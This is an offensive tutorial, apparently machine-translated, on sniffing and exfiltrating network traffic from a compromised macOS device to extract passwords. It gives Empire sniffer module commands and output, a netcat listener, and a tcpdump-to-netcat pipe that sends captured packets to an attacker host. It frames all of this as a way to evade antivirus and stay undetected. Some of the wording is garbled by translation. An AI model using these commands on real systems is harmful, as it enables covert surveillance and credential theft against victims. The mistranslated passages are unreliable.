With the increase in Web site encryption (TLS), spying passwords from network activity has become difficult. However, it is still possible to quietly exfiltrate a target's network traffic in real time to extract passwords and sensitive information. In terms of macOS, there are two ways to get traffic from a back-doctor Mac.
The first method requires Empire, a post-exploitation framework. Empire can be embedded in a MacBook with a USB Rubber Ducky during a single-user mode attack or by social engineering the target to execute a malicious command. The Empire module sniffer makes capturing and filtering data traffic easy.
Method 2 does not require post-exploitation frameworks and is much more discrete. This technique may be desirable for users trying to bypass antivirus detection because some empire modules are marked as malicious. From a primitive Netcat backdoor, Tcpdump (preinstalled on macOS) can be used to capture network traffic and extract the data using a Netcat tunnel. This technique is considered "life outside the country" and could be favored by readers who try to remain completely undetected on the device.
: Use the Empire Sniffer Module
(Empire: V9DGUVIL)> usemodule collection / osx / sniffer *  Use the options command to display the available settings
(Empire: python / collection / osx / sniffer)> options Name: Pcap Sniffer Module: Python / Collection / Osx / Sniffer NeedsAdmin: True OpsecSafe: Wrong Language: Python MinLanguageVersion: 2.6 Background: Wrong OutputExtension: pcap authors: Alex Rymdeko-Harvey @ Killswitch GUI Description: This module performs a complete network stack capture. Remarks: With libpcap.dylib we can do full pcap on a remote Host. options: Name Required value Description ---- -------- ------- ----------- PcapDylib True /usr/lib/libpcap.A.dylib Path of Pcap Dylib (Defualt) Agent True V9DGUVIL Agent to run from. MaxPackets True 100 Max. Define packages to capture. SavePath True /tmp/debug.pcap Path of the file to be saved CaptureInterface False Set Interface name ie. en0 (Automatic resolution By default) Debug True False Enabled to receive verbose message status (Do not enable OutputExtension for this). LibcDylib True /usr/lib/libSystem.B.dyl Std-C-Dylib path (Defualt)
The [MaxPackets option determines when to terminate the packet sniffer. By default, it is set to 100 packets, which is pretty low. A value much higher, such as 1,000 or 10,000, may be more desirable for most scenarios. Change the MaxPackets value with the following command:
(Empire: python / collection / osx / sniffer)> set MaxPackets 1000
Empire will capture packets and save them to the Mac OS device file named "debug.pcap" in the / tmp / directory. Use the following command to change the directory. Note that creating files on the compromised device can be dangerous for reasons I will explain later in option 2.
(Empire: python / collection / osx / sniffer)> SavePath / Path / to / new / directory / outputFilename.pcap
Finally, execute to sniff traffic on the backdoored macOS device to start.
(Empire: python / collection / osx / sniffer)> execute [>] Module is not opsec safe, run? [y/N] y [*] TASK_CMD_WAIT_SAVE was executed with V9DGUVIL [*] Agent V9DGUVIL is tasked with task ID 9 [*] Task Agent V9DGUVIL to run the module python / collection / osx / sniffer (Empire: python / collection / osx / sniffer)>
After a few seconds Empire will automatically exfiltrate the PCAP (packet capture) into your Kali system and save a new PCAP file with the snooped traffic into your empire directory.
[*] Compressed size of tokyoneons-macbook-air.local.pcap Download: 294 KB [*] Final size of tokyoneons-macbook-air.local.pcap wrote: 381 KB [+] File sniffer / tokyoneons-MacBook-Air.local.pcap saved by V9DGUVIL [*] Agent V9DGUVIL returned results. Output stored in ./downloads/V9DGUVIL/sniffer/tokyoneons-MacBook-Air.local.pcap [*] Valid results from 192.168.0.133
Navigate to / path / to / Empire / downloads /
/ sniffer / to find the PCAP if Empire is running locally. Alternatively, when Empire runs on a VPS, its directories can be synchronized with a local computer using Syncthing, a secure file-sharing software.
Option 2: Use tcpdump to sniff traffic
As mentioned before Tcpdump, a command line network traffic analyzer, is preinstalled in MacOS devices. Unlike Empire, Tcpdump is configured to immediately send (exfiltrate) the data to the attacker's computer. With this method, the attacker does not need to create (suspect) PCAP files anywhere on the target device. Creating files on the compromised device can be dangerous and warn the victim of our presence.
Before we can capture and exfiltrate the traffic discovered by the macOS device, we need to set up a Listening service to receive the incoming data. To achieve this, we use Netcat in Kali.
nc -l -p 7777 | Tee /tmp/sniffed_output.pcapng tcpdump: listen on wlan0, link type AAAAAA (Ethernet), capture size 262144 bytes
Netcat will wait for incoming connections on port ( -l ) ( -p ) 7777 . The port number is here arbitrary and can be arbitrary. Netcat will then pipel the packets into tee which will write the data to a local file on the attacker's system.
Now use the following command from a backdoor to capture the traffic and send it to the attacker's Netcat listener.
/ usr / sbin / tcpdump -w - | nc ATTACKER-IP-HERE 7777 tcpdump: Data connection type PKTAP tcpdump: Listening to pktap, link-type PKTAP (Apple DLT_PKTAP), capture size 262144 bytes Got 665
Both Netcat terminals must remain open to continue collecting, sending, and receiving data. The -w in this command is required for tcpdump to output data in a pipable format and effectively send the data through the netcat tunnel. Other tcpdump arguments and filters can be used before data is sent through the pipe, but -w must always be present.
The "Got 665" in the above terminal indicates how many packets to the attacker system. This number increases as the victim continues to use the Internet.
To stop packet exfiltration (without losing the Netcat backdoor), press Ctrl-C in the attacker's Netcat terminal. The captured data can be analyzed for sensitive information using the Tshark and Wireshark which I will show in my next article. And that's it for capturing and exfiltration of network activity from MacOS devices.